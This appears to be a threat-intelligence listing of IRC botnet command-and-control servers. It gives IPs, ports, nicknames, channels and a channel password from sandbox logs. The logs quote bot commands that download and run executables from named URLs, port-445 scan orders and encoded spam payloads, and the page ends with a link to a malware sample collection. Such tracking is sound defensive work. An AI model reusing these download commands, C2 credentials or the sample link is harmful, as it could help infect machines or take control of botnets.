test.sig-clan.com 64.186.131.40 64.186.131.40:4042 Nick: new[AUT|XP|pc0]qdpbhxq Username: hh Joined Channel: #chronic infos about hosting: http://whois.domaintools.com/64.186.131.40
im.updateserver.net(botnet hosted in United States Clifton Fortressitx)
im.updateserver.net 69.72.177.130 Remote Host Port Number 69.72.177.130 1863 PASS google_cache2.tmp NICK n[USA|XP]847980 USER 8479 “” “TsGh” :8479 JOIN #newbin# abc PONG 422 !im http://is.gd/nK9rS1?=IMG-DSC-16-02-2011-JPG !sort infos about hosting: http://whois.domaintools.com/69.72.177.130
64.32.28.18(botnet hosted in United States Missoula Sharktech Internet Services)
Remote Host Port Number 64.32.28.18 6667 NICK [USA|XP|njwfobd] USER vdifkkmdud “” “lol” :vdifkkmdud JOIN #GGGuardian PONG :R00t.Gov infos about hosting: http://whois.domaintools.com/64.32.28.18
im.maximum-irc.info(botnet hosted in United States Kingston University Of Rhode Island)
im.maximum-irc.info 131.128.57.195 Outgoing connection to remote server: im.maximum-irc.info TCP port 9595 [8:53] … Now talking in #swarm#… [8:53] … Topic On: [ #swarm# ] [ .update http://dickolsthoorn.nl/dn.exe win.exe 1 ] [8:53] … Topic By: [ me ] [8:53] … Modes On: [ #swarm# ] [ +smntMu ] NICK {NEW}[USA][XP]384495 USER svr-2771 “” “svr-” :svr-2771 PONGRead more...
193.106.173.130(botnet hosted in Russian Federation Iqhost Ltd)
Remote Host Port Number 193.106.173.130 2550 PASS (null) NICK {N}|USA|XP|COMPUTERNAME|624232 USER kanbps “” “vagy” :COMPUTERNAME JOIN #chef PRIVMSG #chef :New Servant. !wget http://r-promofile.info/10039-1.exe infos about hosting: http://whois.domaintools.com/193.106.173.130
facebook-o.com( botnet hosted in CNC Group CHINA169 Sichuan Province network)
Another server from our russian friend snk big hecker Remote Host Port Number 118.144.79.148 5500 194.109.6.97 80 NICK n[USA|XP]0991293 USER x “” “x” 😡 JOIN #xux PONG 422 PONG :srv5500.net * Topic is ‘.usb .msn ALL /125/115/124/115/38/48/62/125/82/118/43/114/98/65/106/108/126/65/127/126/112/104/124/36/66/114/48/124/106/117/102/105/78/44/108/77/106/53/108/99/58/47/43/61/78/107/120/117/112/105/51/67/94/102/44/19/63/56/38/19/36/63/49/56/22/15/105/85/87/’ .msn ALL /125/115/124/115/38/48/62/125/82/118/43/114/98/65/106/108/126/65/127/126/112/104/124/36/66/114/48/124/106/117/102/105/78/44/108/77/106/53/108/99/58/47/43/61/78/107/120/117/112/105/51/67/94/102/44/19/63/56/38/19/36/63/49/56/22/15/105/85/87/ DNS Lookup Host Name IP Address facebook-o.com 118.144.79.148 facebook-t.com 118.144.79.148 x1x4x0.net 127.0.0.1 Outgoing connection toRead more...
findcopper.org (malware hosted in Latvia Odessa Hosting Service)
DNS Lookup Host Name IP Address finddamaged.org finddamaged.org 86.55.211.249 findcopper.org findcopper.org 91.200.242.17 findvoiceless.org findvoiceless.org 91.200.242.87 Outgoing connection to remote server: finddamaged.org TCP port 80 Outgoing connection to remote server: findvoiceless.org TCP port 80 Outgoing connection to remote server: findcopper.org TCP port 80 Outgoing connection to remote server: findcopper.org TCP port 80 Outgoing connection to remoteRead more...
java.KUTLUFAMILY.COM ( botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105] Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104] Remote Host Port Number 178.211.56.104 81 ircd here 74.206.242.164 80 NICK [N00_USA_XP_3401546]` PRIVMSG [N00_USA_XP_3401 @ :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 10 threads. @ :scan; Random Port Scan started on 174.x.x.x:445 with a delayRead more...
cobain.sdeirc.net (botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
cobain.sdeirc.net DNS_TYPE_A 46.243.8.6 46.243.8.6:4747 Nick: {SwarM}{AUT}{N}405701 Username: 8682 Joined Channel: #CoBaIN with Password GOFK12 infos about hosting: http://whois.domaintools.com/178.211.56.104
around 24 mb exe files
another malwares collection around 24 mb here download link: http://e0cc6bdb.theseforums.com